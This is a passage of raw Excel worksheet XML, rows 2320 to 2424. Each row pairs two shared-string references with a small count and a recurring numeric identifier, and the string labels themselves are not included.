    <row r="2320" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2320" t="s">
        <v>16230</v>
      </c>
      <c r="B2320" t="s">
        <v>16222</v>
      </c>
      <c r="C2320">
        <v>7</v>
      </c>
      <c r="D2320">
        <v>2577</v>
      </c>
    </row>
    <row r="2321" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2321" t="s">
        <v>16223</v>
      </c>
      <c r="B2321" t="s">
        <v>16223</v>
      </c>
      <c r="C2321">
        <v>26</v>
      </c>
      <c r="D2321">
        <v>2577</v>
      </c>
    </row>
    <row r="2322" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2322" t="s">
        <v>16224</v>
      </c>
      <c r="B2322" t="s">
        <v>16224</v>
      </c>
      <c r="C2322">
        <v>1</v>
      </c>
      <c r="D2322">
        <v>2577</v>
      </c>
    </row>
    <row r="2323" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2323" t="s">
        <v>16228</v>
      </c>
      <c r="B2323" t="s">
        <v>16211</v>
      </c>
      <c r="C2323">
        <v>0</v>
      </c>
      <c r="D2323">
        <v>2290</v>
      </c>
    </row>
    <row r="2324" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2324" t="s">
        <v>16231</v>
      </c>
      <c r="B2324" t="s">
        <v>16212</v>
      </c>
      <c r="C2324">
        <v>0</v>
      </c>
      <c r="D2324">
        <v>2290</v>
      </c>
    </row>
    <row r="2325" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2325" t="s">
        <v>16228</v>
      </c>
      <c r="B2325" t="s">
        <v>16213</v>
      </c>
      <c r="C2325">
        <v>0</v>
      </c>
      <c r="D2325">
        <v>2290</v>
      </c>
    </row>
    <row r="2326" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2326" t="s">
        <v>16231</v>
      </c>
      <c r="B2326" t="s">
        <v>16214</v>
      </c>
      <c r="C2326">
        <v>0</v>
      </c>
      <c r="D2326">
        <v>2290</v>
      </c>
    </row>
    <row r="2327" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2327" t="s">
        <v>16228</v>
      </c>
      <c r="B2327" t="s">
        <v>16215</v>
      </c>
      <c r="C2327">
        <v>1</v>
      </c>
      <c r="D2327">
        <v>2290</v>
      </c>
    </row>
    <row r="2328" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2328" t="s">
        <v>16231</v>
      </c>
      <c r="B2328" t="s">
        <v>16216</v>
      </c>
      <c r="C2328">
        <v>0</v>
      </c>
      <c r="D2328">
        <v>2290</v>
      </c>
    </row>
    <row r="2329" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2329" t="s">
        <v>16228</v>
      </c>
      <c r="B2329" t="s">
        <v>16217</v>
      </c>
      <c r="C2329">
        <v>6</v>
      </c>
      <c r="D2329">
        <v>2290</v>
      </c>
    </row>
    <row r="2330" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2330" t="s">
        <v>16231</v>
      </c>
      <c r="B2330" t="s">
        <v>16218</v>
      </c>
      <c r="C2330">
        <v>6</v>
      </c>
      <c r="D2330">
        <v>2290</v>
      </c>
    </row>
    <row r="2331" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2331" t="s">
        <v>16229</v>
      </c>
      <c r="B2331" t="s">
        <v>16219</v>
      </c>
      <c r="C2331">
        <v>0</v>
      </c>
      <c r="D2331">
        <v>2290</v>
      </c>
    </row>
    <row r="2332" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2332" t="s">
        <v>16230</v>
      </c>
      <c r="B2332" t="s">
        <v>16220</v>
      </c>
      <c r="C2332">
        <v>0</v>
      </c>
      <c r="D2332">
        <v>2290</v>
      </c>
    </row>
    <row r="2333" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2333" t="s">
        <v>16229</v>
      </c>
      <c r="B2333" t="s">
        <v>16221</v>
      </c>
      <c r="C2333">
        <v>4</v>
      </c>
      <c r="D2333">
        <v>2290</v>
      </c>
    </row>
    <row r="2334" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2334" t="s">
        <v>16230</v>
      </c>
      <c r="B2334" t="s">
        <v>16222</v>
      </c>
      <c r="C2334">
        <v>0</v>
      </c>
      <c r="D2334">
        <v>2290</v>
      </c>
    </row>
    <row r="2335" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2335" t="s">
        <v>16223</v>
      </c>
      <c r="B2335" t="s">
        <v>16223</v>
      </c>
      <c r="C2335">
        <v>20</v>
      </c>
      <c r="D2335">
        <v>2290</v>
      </c>
    </row>
    <row r="2336" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2336" t="s">
        <v>16224</v>
      </c>
      <c r="B2336" t="s">
        <v>16224</v>
      </c>
      <c r="C2336">
        <v>1</v>
      </c>
      <c r="D2336">
        <v>2290</v>
      </c>
    </row>
    <row r="2337" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2337" t="s">
        <v>16228</v>
      </c>
      <c r="B2337" t="s">
        <v>16211</v>
      </c>
      <c r="C2337">
        <v>0</v>
      </c>
      <c r="D2337">
        <v>2574</v>
      </c>
    </row>
    <row r="2338" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2338" t="s">
        <v>16231</v>
      </c>
      <c r="B2338" t="s">
        <v>16212</v>
      </c>
      <c r="C2338">
        <v>0</v>
      </c>
      <c r="D2338">
        <v>2574</v>
      </c>
    </row>
    <row r="2339" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2339" t="s">
        <v>16228</v>
      </c>
      <c r="B2339" t="s">
        <v>16213</v>
      </c>
      <c r="C2339">
        <v>0</v>
      </c>
      <c r="D2339">
        <v>2574</v>
      </c>
    </row>
    <row r="2340" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2340" t="s">
        <v>16231</v>
      </c>
      <c r="B2340" t="s">
        <v>16214</v>
      </c>
      <c r="C2340">
        <v>0</v>
      </c>
      <c r="D2340">
        <v>2574</v>
      </c>
    </row>
    <row r="2341" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2341" t="s">
        <v>16228</v>
      </c>
      <c r="B2341" t="s">
        <v>16215</v>
      </c>
      <c r="C2341">
        <v>1</v>
      </c>
      <c r="D2341">
        <v>2574</v>
      </c>
    </row>
    <row r="2342" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2342" t="s">
        <v>16231</v>
      </c>
      <c r="B2342" t="s">
        <v>16216</v>
      </c>
      <c r="C2342">
        <v>0</v>
      </c>
      <c r="D2342">
        <v>2574</v>
      </c>
    </row>
    <row r="2343" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2343" t="s">
        <v>16228</v>
      </c>
      <c r="B2343" t="s">
        <v>16217</v>
      </c>
      <c r="C2343">
        <v>3</v>
      </c>
      <c r="D2343">
        <v>2574</v>
      </c>
    </row>
    <row r="2344" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2344" t="s">
        <v>16231</v>
      </c>
      <c r="B2344" t="s">
        <v>16218</v>
      </c>
      <c r="C2344">
        <v>0</v>
      </c>
      <c r="D2344">
        <v>2574</v>
      </c>
    </row>
    <row r="2345" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2345" t="s">
        <v>16229</v>
      </c>
      <c r="B2345" t="s">
        <v>16219</v>
      </c>
      <c r="C2345">
        <v>0</v>
      </c>
      <c r="D2345">
        <v>2574</v>
      </c>
    </row>
    <row r="2346" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2346" t="s">
        <v>16230</v>
      </c>
      <c r="B2346" t="s">
        <v>16220</v>
      </c>
      <c r="C2346">
        <v>2</v>
      </c>
      <c r="D2346">
        <v>2574</v>
      </c>
    </row>
    <row r="2347" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2347" t="s">
        <v>16229</v>
      </c>
      <c r="B2347" t="s">
        <v>16221</v>
      </c>
      <c r="C2347">
        <v>10</v>
      </c>
      <c r="D2347">
        <v>2574</v>
      </c>
    </row>
    <row r="2348" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2348" t="s">
        <v>16230</v>
      </c>
      <c r="B2348" t="s">
        <v>16222</v>
      </c>
      <c r="C2348">
        <v>0</v>
      </c>
      <c r="D2348">
        <v>2574</v>
      </c>
    </row>
    <row r="2349" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2349" t="s">
        <v>16223</v>
      </c>
      <c r="B2349" t="s">
        <v>16223</v>
      </c>
      <c r="C2349">
        <v>0</v>
      </c>
      <c r="D2349">
        <v>2574</v>
      </c>
    </row>
    <row r="2350" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2350" t="s">
        <v>16224</v>
      </c>
      <c r="B2350" t="s">
        <v>16224</v>
      </c>
      <c r="C2350">
        <v>0</v>
      </c>
      <c r="D2350">
        <v>2574</v>
      </c>
    </row>
    <row r="2351" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2351" t="s">
        <v>16228</v>
      </c>
      <c r="B2351" t="s">
        <v>16211</v>
      </c>
      <c r="C2351">
        <v>1</v>
      </c>
      <c r="D2351">
        <v>2602</v>
      </c>
    </row>
    <row r="2352" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2352" t="s">
        <v>16231</v>
      </c>
      <c r="B2352" t="s">
        <v>16212</v>
      </c>
      <c r="C2352">
        <v>0</v>
      </c>
      <c r="D2352">
        <v>2602</v>
      </c>
    </row>
    <row r="2353" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2353" t="s">
        <v>16228</v>
      </c>
      <c r="B2353" t="s">
        <v>16213</v>
      </c>
      <c r="C2353">
        <v>2</v>
      </c>
      <c r="D2353">
        <v>2602</v>
      </c>
    </row>
    <row r="2354" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2354" t="s">
        <v>16231</v>
      </c>
      <c r="B2354" t="s">
        <v>16214</v>
      </c>
      <c r="C2354">
        <v>0</v>
      </c>
      <c r="D2354">
        <v>2602</v>
      </c>
    </row>
    <row r="2355" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2355" t="s">
        <v>16228</v>
      </c>
      <c r="B2355" t="s">
        <v>16215</v>
      </c>
      <c r="C2355">
        <v>1</v>
      </c>
      <c r="D2355">
        <v>2602</v>
      </c>
    </row>
    <row r="2356" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2356" t="s">
        <v>16231</v>
      </c>
      <c r="B2356" t="s">
        <v>16216</v>
      </c>
      <c r="C2356">
        <v>0</v>
      </c>
      <c r="D2356">
        <v>2602</v>
      </c>
    </row>
    <row r="2357" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2357" t="s">
        <v>16228</v>
      </c>
      <c r="B2357" t="s">
        <v>16217</v>
      </c>
      <c r="C2357">
        <v>2</v>
      </c>
      <c r="D2357">
        <v>2602</v>
      </c>
    </row>
    <row r="2358" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2358" t="s">
        <v>16231</v>
      </c>
      <c r="B2358" t="s">
        <v>16218</v>
      </c>
      <c r="C2358">
        <v>0</v>
      </c>
      <c r="D2358">
        <v>2602</v>
      </c>
    </row>
    <row r="2359" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2359" t="s">
        <v>16229</v>
      </c>
      <c r="B2359" t="s">
        <v>16219</v>
      </c>
      <c r="C2359">
        <v>0</v>
      </c>
      <c r="D2359">
        <v>2602</v>
      </c>
    </row>
    <row r="2360" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2360" t="s">
        <v>16230</v>
      </c>
      <c r="B2360" t="s">
        <v>16220</v>
      </c>
      <c r="C2360">
        <v>0</v>
      </c>
      <c r="D2360">
        <v>2602</v>
      </c>
    </row>
    <row r="2361" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2361" t="s">
        <v>16229</v>
      </c>
      <c r="B2361" t="s">
        <v>16221</v>
      </c>
      <c r="C2361">
        <v>5</v>
      </c>
      <c r="D2361">
        <v>2602</v>
      </c>
    </row>
    <row r="2362" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2362" t="s">
        <v>16230</v>
      </c>
      <c r="B2362" t="s">
        <v>16222</v>
      </c>
      <c r="C2362">
        <v>0</v>
      </c>
      <c r="D2362">
        <v>2602</v>
      </c>
    </row>
    <row r="2363" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2363" t="s">
        <v>16223</v>
      </c>
      <c r="B2363" t="s">
        <v>16223</v>
      </c>
      <c r="C2363">
        <v>30</v>
      </c>
      <c r="D2363">
        <v>2602</v>
      </c>
    </row>
    <row r="2364" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2364" t="s">
        <v>16224</v>
      </c>
      <c r="B2364" t="s">
        <v>16224</v>
      </c>
      <c r="C2364">
        <v>2</v>
      </c>
      <c r="D2364">
        <v>2602</v>
      </c>
    </row>
    <row r="2365" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2365" t="s">
        <v>16228</v>
      </c>
      <c r="B2365" t="s">
        <v>16211</v>
      </c>
      <c r="C2365">
        <v>0</v>
      </c>
      <c r="D2365">
        <v>1701</v>
      </c>
    </row>
    <row r="2366" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2366" t="s">
        <v>16231</v>
      </c>
      <c r="B2366" t="s">
        <v>16212</v>
      </c>
      <c r="C2366">
        <v>0</v>
      </c>
      <c r="D2366">
        <v>1701</v>
      </c>
    </row>
    <row r="2367" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2367" t="s">
        <v>16228</v>
      </c>
      <c r="B2367" t="s">
        <v>16213</v>
      </c>
      <c r="C2367">
        <v>0</v>
      </c>
      <c r="D2367">
        <v>1701</v>
      </c>
    </row>
    <row r="2368" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2368" t="s">
        <v>16231</v>
      </c>
      <c r="B2368" t="s">
        <v>16214</v>
      </c>
      <c r="C2368">
        <v>0</v>
      </c>
      <c r="D2368">
        <v>1701</v>
      </c>
    </row>
    <row r="2369" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2369" t="s">
        <v>16228</v>
      </c>
      <c r="B2369" t="s">
        <v>16215</v>
      </c>
      <c r="C2369">
        <v>0</v>
      </c>
      <c r="D2369">
        <v>1701</v>
      </c>
    </row>
    <row r="2370" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2370" t="s">
        <v>16231</v>
      </c>
      <c r="B2370" t="s">
        <v>16216</v>
      </c>
      <c r="C2370">
        <v>2</v>
      </c>
      <c r="D2370">
        <v>1701</v>
      </c>
    </row>
    <row r="2371" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2371" t="s">
        <v>16228</v>
      </c>
      <c r="B2371" t="s">
        <v>16217</v>
      </c>
      <c r="C2371">
        <v>0</v>
      </c>
      <c r="D2371">
        <v>1701</v>
      </c>
    </row>
    <row r="2372" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2372" t="s">
        <v>16231</v>
      </c>
      <c r="B2372" t="s">
        <v>16218</v>
      </c>
      <c r="C2372">
        <v>8</v>
      </c>
      <c r="D2372">
        <v>1701</v>
      </c>
    </row>
    <row r="2373" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2373" t="s">
        <v>16229</v>
      </c>
      <c r="B2373" t="s">
        <v>16219</v>
      </c>
      <c r="C2373">
        <v>0</v>
      </c>
      <c r="D2373">
        <v>1701</v>
      </c>
    </row>
    <row r="2374" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2374" t="s">
        <v>16230</v>
      </c>
      <c r="B2374" t="s">
        <v>16220</v>
      </c>
      <c r="C2374">
        <v>0</v>
      </c>
      <c r="D2374">
        <v>1701</v>
      </c>
    </row>
    <row r="2375" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2375" t="s">
        <v>16229</v>
      </c>
      <c r="B2375" t="s">
        <v>16221</v>
      </c>
      <c r="C2375">
        <v>0</v>
      </c>
      <c r="D2375">
        <v>1701</v>
      </c>
    </row>
    <row r="2376" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2376" t="s">
        <v>16230</v>
      </c>
      <c r="B2376" t="s">
        <v>16222</v>
      </c>
      <c r="C2376">
        <v>0</v>
      </c>
      <c r="D2376">
        <v>1701</v>
      </c>
    </row>
    <row r="2377" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2377" t="s">
        <v>16223</v>
      </c>
      <c r="B2377" t="s">
        <v>16223</v>
      </c>
      <c r="C2377">
        <v>6</v>
      </c>
      <c r="D2377">
        <v>1701</v>
      </c>
    </row>
    <row r="2378" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2378" t="s">
        <v>16224</v>
      </c>
      <c r="B2378" t="s">
        <v>16224</v>
      </c>
      <c r="C2378">
        <v>1</v>
      </c>
      <c r="D2378">
        <v>1701</v>
      </c>
    </row>
    <row r="2379" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2379" t="s">
        <v>16228</v>
      </c>
      <c r="B2379" t="s">
        <v>16211</v>
      </c>
      <c r="C2379">
        <v>0</v>
      </c>
      <c r="D2379">
        <v>796</v>
      </c>
    </row>
    <row r="2380" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2380" t="s">
        <v>16231</v>
      </c>
      <c r="B2380" t="s">
        <v>16212</v>
      </c>
      <c r="C2380">
        <v>0</v>
      </c>
      <c r="D2380">
        <v>796</v>
      </c>
    </row>
    <row r="2381" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2381" t="s">
        <v>16228</v>
      </c>
      <c r="B2381" t="s">
        <v>16213</v>
      </c>
      <c r="C2381">
        <v>0</v>
      </c>
      <c r="D2381">
        <v>796</v>
      </c>
    </row>
    <row r="2382" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2382" t="s">
        <v>16231</v>
      </c>
      <c r="B2382" t="s">
        <v>16214</v>
      </c>
      <c r="C2382">
        <v>0</v>
      </c>
      <c r="D2382">
        <v>796</v>
      </c>
    </row>
    <row r="2383" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2383" t="s">
        <v>16228</v>
      </c>
      <c r="B2383" t="s">
        <v>16215</v>
      </c>
      <c r="C2383">
        <v>15</v>
      </c>
      <c r="D2383">
        <v>796</v>
      </c>
    </row>
    <row r="2384" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2384" t="s">
        <v>16231</v>
      </c>
      <c r="B2384" t="s">
        <v>16216</v>
      </c>
      <c r="C2384">
        <v>79</v>
      </c>
      <c r="D2384">
        <v>796</v>
      </c>
    </row>
    <row r="2385" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2385" t="s">
        <v>16228</v>
      </c>
      <c r="B2385" t="s">
        <v>16217</v>
      </c>
      <c r="C2385">
        <v>95</v>
      </c>
      <c r="D2385">
        <v>796</v>
      </c>
    </row>
    <row r="2386" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2386" t="s">
        <v>16231</v>
      </c>
      <c r="B2386" t="s">
        <v>16218</v>
      </c>
      <c r="C2386">
        <v>222</v>
      </c>
      <c r="D2386">
        <v>796</v>
      </c>
    </row>
    <row r="2387" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2387" t="s">
        <v>16229</v>
      </c>
      <c r="B2387" t="s">
        <v>16219</v>
      </c>
      <c r="C2387">
        <v>0</v>
      </c>
      <c r="D2387">
        <v>796</v>
      </c>
    </row>
    <row r="2388" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2388" t="s">
        <v>16230</v>
      </c>
      <c r="B2388" t="s">
        <v>16220</v>
      </c>
      <c r="C2388">
        <v>0</v>
      </c>
      <c r="D2388">
        <v>796</v>
      </c>
    </row>
    <row r="2389" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2389" t="s">
        <v>16229</v>
      </c>
      <c r="B2389" t="s">
        <v>16221</v>
      </c>
      <c r="C2389">
        <v>0</v>
      </c>
      <c r="D2389">
        <v>796</v>
      </c>
    </row>
    <row r="2390" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2390" t="s">
        <v>16230</v>
      </c>
      <c r="B2390" t="s">
        <v>16222</v>
      </c>
      <c r="C2390">
        <v>50</v>
      </c>
      <c r="D2390">
        <v>796</v>
      </c>
    </row>
    <row r="2391" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2391" t="s">
        <v>16223</v>
      </c>
      <c r="B2391" t="s">
        <v>16223</v>
      </c>
      <c r="C2391">
        <v>24</v>
      </c>
      <c r="D2391">
        <v>796</v>
      </c>
    </row>
    <row r="2392" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2392" t="s">
        <v>16224</v>
      </c>
      <c r="B2392" t="s">
        <v>16224</v>
      </c>
      <c r="C2392">
        <v>1</v>
      </c>
      <c r="D2392">
        <v>796</v>
      </c>
    </row>
    <row r="2393" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2393" t="s">
        <v>16228</v>
      </c>
      <c r="B2393" t="s">
        <v>16211</v>
      </c>
      <c r="C2393">
        <v>0</v>
      </c>
      <c r="D2393">
        <v>2586</v>
      </c>
    </row>
    <row r="2394" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2394" t="s">
        <v>16231</v>
      </c>
      <c r="B2394" t="s">
        <v>16212</v>
      </c>
      <c r="C2394">
        <v>0</v>
      </c>
      <c r="D2394">
        <v>2586</v>
      </c>
    </row>
    <row r="2395" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2395" t="s">
        <v>16228</v>
      </c>
      <c r="B2395" t="s">
        <v>16213</v>
      </c>
      <c r="C2395">
        <v>0</v>
      </c>
      <c r="D2395">
        <v>2586</v>
      </c>
    </row>
    <row r="2396" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2396" t="s">
        <v>16231</v>
      </c>
      <c r="B2396" t="s">
        <v>16214</v>
      </c>
      <c r="C2396">
        <v>0</v>
      </c>
      <c r="D2396">
        <v>2586</v>
      </c>
    </row>
    <row r="2397" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2397" t="s">
        <v>16228</v>
      </c>
      <c r="B2397" t="s">
        <v>16215</v>
      </c>
      <c r="C2397">
        <v>10</v>
      </c>
      <c r="D2397">
        <v>2586</v>
      </c>
    </row>
    <row r="2398" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2398" t="s">
        <v>16231</v>
      </c>
      <c r="B2398" t="s">
        <v>16216</v>
      </c>
      <c r="C2398">
        <v>15</v>
      </c>
      <c r="D2398">
        <v>2586</v>
      </c>
    </row>
    <row r="2399" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2399" t="s">
        <v>16228</v>
      </c>
      <c r="B2399" t="s">
        <v>16217</v>
      </c>
      <c r="C2399">
        <v>0</v>
      </c>
      <c r="D2399">
        <v>2586</v>
      </c>
    </row>
    <row r="2400" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2400" t="s">
        <v>16231</v>
      </c>
      <c r="B2400" t="s">
        <v>16218</v>
      </c>
      <c r="C2400">
        <v>0</v>
      </c>
      <c r="D2400">
        <v>2586</v>
      </c>
    </row>
    <row r="2401" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2401" t="s">
        <v>16229</v>
      </c>
      <c r="B2401" t="s">
        <v>16219</v>
      </c>
      <c r="C2401">
        <v>0</v>
      </c>
      <c r="D2401">
        <v>2586</v>
      </c>
    </row>
    <row r="2402" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2402" t="s">
        <v>16230</v>
      </c>
      <c r="B2402" t="s">
        <v>16220</v>
      </c>
      <c r="C2402">
        <v>0</v>
      </c>
      <c r="D2402">
        <v>2586</v>
      </c>
    </row>
    <row r="2403" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2403" t="s">
        <v>16229</v>
      </c>
      <c r="B2403" t="s">
        <v>16221</v>
      </c>
      <c r="C2403">
        <v>23</v>
      </c>
      <c r="D2403">
        <v>2586</v>
      </c>
    </row>
    <row r="2404" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2404" t="s">
        <v>16230</v>
      </c>
      <c r="B2404" t="s">
        <v>16222</v>
      </c>
      <c r="C2404">
        <v>3</v>
      </c>
      <c r="D2404">
        <v>2586</v>
      </c>
    </row>
    <row r="2405" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2405" t="s">
        <v>16223</v>
      </c>
      <c r="B2405" t="s">
        <v>16223</v>
      </c>
      <c r="C2405">
        <v>25</v>
      </c>
      <c r="D2405">
        <v>2586</v>
      </c>
    </row>
    <row r="2406" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2406" t="s">
        <v>16224</v>
      </c>
      <c r="B2406" t="s">
        <v>16224</v>
      </c>
      <c r="C2406">
        <v>0</v>
      </c>
      <c r="D2406">
        <v>2586</v>
      </c>
    </row>
    <row r="2407" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2407" t="s">
        <v>16228</v>
      </c>
      <c r="B2407" t="s">
        <v>16211</v>
      </c>
      <c r="C2407">
        <v>0</v>
      </c>
      <c r="D2407">
        <v>2568</v>
      </c>
    </row>
    <row r="2408" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2408" t="s">
        <v>16231</v>
      </c>
      <c r="B2408" t="s">
        <v>16212</v>
      </c>
      <c r="C2408">
        <v>0</v>
      </c>
      <c r="D2408">
        <v>2568</v>
      </c>
    </row>
    <row r="2409" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2409" t="s">
        <v>16228</v>
      </c>
      <c r="B2409" t="s">
        <v>16213</v>
      </c>
      <c r="C2409">
        <v>0</v>
      </c>
      <c r="D2409">
        <v>2568</v>
      </c>
    </row>
    <row r="2410" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2410" t="s">
        <v>16231</v>
      </c>
      <c r="B2410" t="s">
        <v>16214</v>
      </c>
      <c r="C2410">
        <v>0</v>
      </c>
      <c r="D2410">
        <v>2568</v>
      </c>
    </row>
    <row r="2411" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2411" t="s">
        <v>16228</v>
      </c>
      <c r="B2411" t="s">
        <v>16215</v>
      </c>
      <c r="C2411">
        <v>1</v>
      </c>
      <c r="D2411">
        <v>2568</v>
      </c>
    </row>
    <row r="2412" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2412" t="s">
        <v>16231</v>
      </c>
      <c r="B2412" t="s">
        <v>16216</v>
      </c>
      <c r="C2412">
        <v>1</v>
      </c>
      <c r="D2412">
        <v>2568</v>
      </c>
    </row>
    <row r="2413" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2413" t="s">
        <v>16228</v>
      </c>
      <c r="B2413" t="s">
        <v>16217</v>
      </c>
      <c r="C2413">
        <v>5</v>
      </c>
      <c r="D2413">
        <v>2568</v>
      </c>
    </row>
    <row r="2414" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2414" t="s">
        <v>16231</v>
      </c>
      <c r="B2414" t="s">
        <v>16218</v>
      </c>
      <c r="C2414">
        <v>0</v>
      </c>
      <c r="D2414">
        <v>2568</v>
      </c>
    </row>
    <row r="2415" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2415" t="s">
        <v>16229</v>
      </c>
      <c r="B2415" t="s">
        <v>16219</v>
      </c>
      <c r="C2415">
        <v>0</v>
      </c>
      <c r="D2415">
        <v>2568</v>
      </c>
    </row>
    <row r="2416" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2416" t="s">
        <v>16230</v>
      </c>
      <c r="B2416" t="s">
        <v>16220</v>
      </c>
      <c r="C2416">
        <v>0</v>
      </c>
      <c r="D2416">
        <v>2568</v>
      </c>
    </row>
    <row r="2417" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2417" t="s">
        <v>16229</v>
      </c>
      <c r="B2417" t="s">
        <v>16221</v>
      </c>
      <c r="C2417">
        <v>10</v>
      </c>
      <c r="D2417">
        <v>2568</v>
      </c>
    </row>
    <row r="2418" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2418" t="s">
        <v>16230</v>
      </c>
      <c r="B2418" t="s">
        <v>16222</v>
      </c>
      <c r="C2418">
        <v>25</v>
      </c>
      <c r="D2418">
        <v>2568</v>
      </c>
    </row>
    <row r="2419" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2419" t="s">
        <v>16223</v>
      </c>
      <c r="B2419" t="s">
        <v>16223</v>
      </c>
      <c r="C2419">
        <v>20</v>
      </c>
      <c r="D2419">
        <v>2568</v>
      </c>
    </row>
    <row r="2420" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2420" t="s">
        <v>16224</v>
      </c>
      <c r="B2420" t="s">
        <v>16224</v>
      </c>
      <c r="C2420">
        <v>1</v>
      </c>
      <c r="D2420">
        <v>2568</v>
      </c>
    </row>
    <row r="2421" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2421" t="s">
        <v>16231</v>
      </c>
      <c r="B2421" t="s">
        <v>16216</v>
      </c>
      <c r="C2421">
        <v>2</v>
      </c>
      <c r="D2421">
        <v>627</v>
      </c>
    </row>
    <row r="2422" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2422" t="s">
        <v>16228</v>
      </c>
      <c r="B2422" t="s">
        <v>16217</v>
      </c>
      <c r="C2422">
        <v>7</v>
      </c>
      <c r="D2422">
        <v>627</v>
      </c>
    </row>
    <row r="2423" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2423" t="s">
        <v>16231</v>
      </c>
      <c r="B2423" t="s">
        <v>16218</v>
      </c>
      <c r="C2423">
        <v>0</v>
      </c>
      <c r="D2423">
        <v>627</v>
      </c>
    </row>
    <row r="2424" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2424" t="s">
        <v>16229</v>
      </c>
      <c r="B2424" t="s">
        <v>16221</v>
      </c>
      <c r="C2424">
        <v>26</v>
      </c>
      <c r="D2424">
        <v>627</v>
      </c>
    </row>
